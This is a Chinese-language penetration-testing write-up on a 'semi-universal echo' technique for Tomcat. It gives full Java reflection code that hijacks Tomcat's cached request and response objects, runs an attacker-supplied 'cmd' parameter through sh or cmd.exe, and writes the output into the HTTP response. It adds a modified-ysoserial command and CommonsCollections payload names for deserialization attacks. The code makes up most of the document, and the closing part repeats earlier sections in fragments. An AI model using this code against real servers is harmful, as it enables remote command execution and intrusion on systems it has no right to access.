Tomcat半通用回显方法技术文档<\/h1>

1. 技术背景<\/h2>
在渗透测试中，当遇到反序列化漏洞或其他Java代码执行场景时，由于网络限制或防护措施，传统的反弹shell方式可能失效。回显技术通过将执行结果附加到HTTP响应中，可以绕过这些限制。<\/p>

2. 技术原理<\/h2>

2.1 核心思路<\/h3>
通过反射修改Tomcat内部变量，获取当前请求的Response对象，从而将命令执行结果直接写入HTTP响应。<\/p>

2.2 关键发现<\/h3>

在org.apache.catalina.core.ApplicationFilterChain<\/code>类中发现了两个关键静态变量：<\/p>


lastServicedRequest<\/code> (ThreadLocal)<\/li>
lastServicedResponse<\/code> (ThreadLocal)<\/li>
<\/ul>
这些变量在ApplicationDispatcher.WRAP_SAME_OBJECT<\/code>为true时会被设置为当前请求的request和response对象。<\/p>
3. 实现步骤<\/h2>
3.1 反射修改关键变量<\/h3>
\/\/ 获取并修改WRAP_SAME_OBJECT字段
<\/span><\/span><\/span><\/span>Field WRAP_SAME_OBJECT_FIELD =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.catalina.core.ApplicationDispatcher"<\/span>)<\/span>
<\/span><\/span>    .<\/span>getDeclaredField<\/span>(<\/span>"WRAP_SAME_OBJECT"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取并修改lastServicedRequest和lastServicedResponse字段
<\/span><\/span><\/span><\/span>Field lastServicedRequestField =<\/span> ApplicationFilterChain.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"lastServicedRequest"<\/span>);<\/span>
<\/span><\/span>Field lastServicedResponseField =<\/span> ApplicationFilterChain.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"lastServicedResponse"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 修改final修饰符
<\/span><\/span><\/span><\/span>Field modifiersField =<\/span> Field.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"modifiers"<\/span>);<\/span>
<\/span><\/span>modifiersField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>modifiersField.<\/span>setInt<\/span>(<\/span>WRAP_SAME_OBJECT_FIELD,<\/span> WRAP_SAME_OBJECT_FIELD.<\/span>getModifiers<\/span>()<\/span> &<\/span> ~<\/span>Modifier.<\/span>FINAL<\/span>);<\/span>
<\/span><\/span>modifiersField.<\/span>setInt<\/span>(<\/span>lastServicedRequestField,<\/span> lastServicedRequestField.<\/span>getModifiers<\/span>()<\/span> &<\/span> ~<\/span>Modifier.<\/span>FINAL<\/span>);<\/span>
<\/span><\/span>modifiersField.<\/span>setInt<\/span>(<\/span>lastServicedResponseField,<\/span> lastServicedResponseField.<\/span>getModifiers<\/span>()<\/span> &<\/span> ~<\/span>Modifier.<\/span>FINAL<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置字段可访问
<\/span><\/span><\/span><\/span>WRAP_SAME_OBJECT_FIELD.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>lastServicedRequestField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>lastServicedResponseField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3.2 初始化变量<\/h3>
ThreadLocal<<\/span>ServletResponse><\/span> lastServicedResponse =<\/span> 
<\/span><\/span>    (<\/span>ThreadLocal<<\/span>ServletResponse>)<\/span> lastServicedResponseField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>ThreadLocal<<\/span>ServletRequest><\/span> lastServicedRequest =<\/span> 
<\/span><\/span>    (<\/span>ThreadLocal<<\/span>ServletRequest>)<\/span> lastServicedRequestField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>boolean<\/span> WRAP_SAME_OBJECT =<\/span> WRAP_SAME_OBJECT_FIELD.<\/span>getBoolean<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 初始化变量
<\/span><\/span><\/span><\/span>if<\/span> (!<\/span>WRAP_SAME_OBJECT ||<\/span> lastServicedResponse ==<\/span> null<\/span> ||<\/span> lastServicedRequest ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>    lastServicedRequestField.<\/span>set<\/span>(<\/span>null<\/span>,<\/span> new<\/span> ThreadLocal<>());<\/span>
<\/span><\/span>    lastServicedResponseField.<\/span>set<\/span>(<\/span>null<\/span>,<\/span> new<\/span> ThreadLocal<>());<\/span>
<\/span><\/span>    WRAP_SAME_OBJECT_FIELD.<\/span>setBoolean<\/span>(<\/span>null<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 执行命令并回显<\/h3>
\/\/ 获取命令参数并执行
<\/span><\/span><\/span><\/span>String cmd =<\/span> lastServicedRequest !=<\/span> null<\/span> 
<\/span><\/span>    ?<\/span> lastServicedRequest.<\/span>get<\/span>().<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)<\/span> 
<\/span><\/span>    :<\/span> null<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> (<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>    ServletResponse responseFacade =<\/span> lastServicedResponse.<\/span>get<\/span>();<\/span>
<\/span><\/span>    responseFacade.<\/span>getWriter<\/span>();<\/span>
<\/span><\/span>    java.<\/span>io<\/span>.<\/span>Writer<\/span> w =<\/span> responseFacade.<\/span>getWriter<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取底层Response对象
<\/span><\/span><\/span><\/span>    Field responseField =<\/span> ResponseFacade.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"response"<\/span>);<\/span>
<\/span><\/span>    responseField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Response response =<\/span> (<\/span>Response)<\/span> responseField.<\/span>get<\/span>(<\/span>responseFacade);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 重置usingWriter标志
<\/span><\/span><\/span><\/span>    Field usingWriter =<\/span> Response.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"usingWriter"<\/span>);<\/span>
<\/span><\/span>    usingWriter.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    usingWriter.<\/span>set<\/span>((<\/span>Object)<\/span> response,<\/span> Boolean.<\/span>FALSE<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>    \/\/ 执行命令
<\/span><\/span><\/span><\/span>    boolean<\/span> isLinux =<\/span> !<\/span>System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>);<\/span>
<\/span><\/span>    String[]<\/span> cmds =<\/span> isLinux ?<\/span> new<\/span> String[]{<\/span>"sh"<\/span>,<\/span> "-c"<\/span>,<\/span> cmd}<\/span> :<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> cmd};<\/span>
<\/span><\/span>    InputStream in =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmds).<\/span>getInputStream<\/span>();<\/span>
<\/span><\/span>    Scanner s =<\/span> new<\/span> Scanner(<\/span>in).<\/span>useDelimiter<\/span>(<\/span>"\\a"<\/span>);<\/span>
<\/span><\/span>    String output =<\/span> s.<\/span>hasNext<\/span>()<\/span> ?<\/span> s.<\/span>next<\/span>()<\/span> :<\/span> ""<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 写入响应
<\/span><\/span><\/span><\/span>    w.<\/span>write<\/span>(<\/span>output);<\/span>
<\/span><\/span>    w.<\/span>flush<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 集成到ysoserial<\/h2>
已修改的ysoserial版本支持Tomcat回显，将第二个参数改为要执行的命令参数名（如"cmd"）：<\/p>
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2TomcatEcho cmd
<\/code><\/pre>
支持的payloads:<\/p>

CommonsCollections2TomcatEcho<\/li>
CommonsCollections3TomcatEcho<\/li>
CommonsCollections4TomcatEcho<\/li>
<\/ul>
5. 技术局限性<\/h2>


Filter限制<\/strong>：在Filter中执行的代码（如Shiro的rememberMe功能）无法使用此方法，因为请求尚未被缓存。<\/p>
<\/li>

需要两次请求<\/strong>：第一次请求用于反射修改变量，第二次请求才能获取回显。<\/p>
<\/li>

Tomcat版本兼容性<\/strong>：依赖于特定Tomcat内部实现，不同版本可能需要调整。<\/p>
<\/li>
<\/ol>
6. 适用场景<\/h2>

开发人员编写的Controller中的代码执行场景<\/li>
反序列化漏洞利用<\/li>
其他Java代码执行场景（非Filter中）<\/li>
<\/ol>
7. 防御建议<\/h2>

限制反射权限<\/li>
监控关键Tomcat类的修改<\/li>
及时更新Tomcat版本<\/li>
对用户输入进行严格过滤<\/li>
<\/ol>
8. 参考资源<\/h2>

修改版ysoserial: https:\/\/github.com\/kingkaki\/ysoserial<\/li>
原始思路参考: https:\/\/xz.aliyun.com\/t\/7307<\/li>
<\/ol>

Tomcat半通用回显方法技术文档<\/h1>

1. 技术背景<\/h2> 在渗透测试中，当遇到反序列化漏洞或其他Java代码执行场景时，由于网络限制或防护措施，传统的反弹shell方式可能失效。回显技术通过将执行结果附加到HTTP响应中，可以绕过这些限制。<\/p>

2. 技术原理<\/h2>

2.1 核心思路<\/h3> 通过反射修改Tomcat内部变量，获取当前请求的Response对象，从而将命令执行结果直接写入HTTP响应。<\/p>

8. 参考资源<\/h2> 修改版ysoserial: https:\/\/github.com\/kingkaki\/ysoserial<\/li> 原始思路参考: https:\/\/xz.aliyun.com\/t\/7307<\/li> <\/ol>

1. 技术背景<\/h2>
在渗透测试中，当遇到反序列化漏洞或其他Java代码执行场景时，由于网络限制或防护措施，传统的反弹shell方式可能失效。回显技术通过将执行结果附加到HTTP响应中，可以绕过这些限制。<\/p>

2.1 核心思路<\/h3>
通过反射修改Tomcat内部变量，获取当前请求的Response对象，从而将命令执行结果直接写入HTTP响应。<\/p>

8. 参考资源<\/h2>

修改版ysoserial: https:\/\/github.com\/kingkaki\/ysoserial<\/li>
原始思路参考: https:\/\/xz.aliyun.com\/t\/7307<\/li> <\/ol>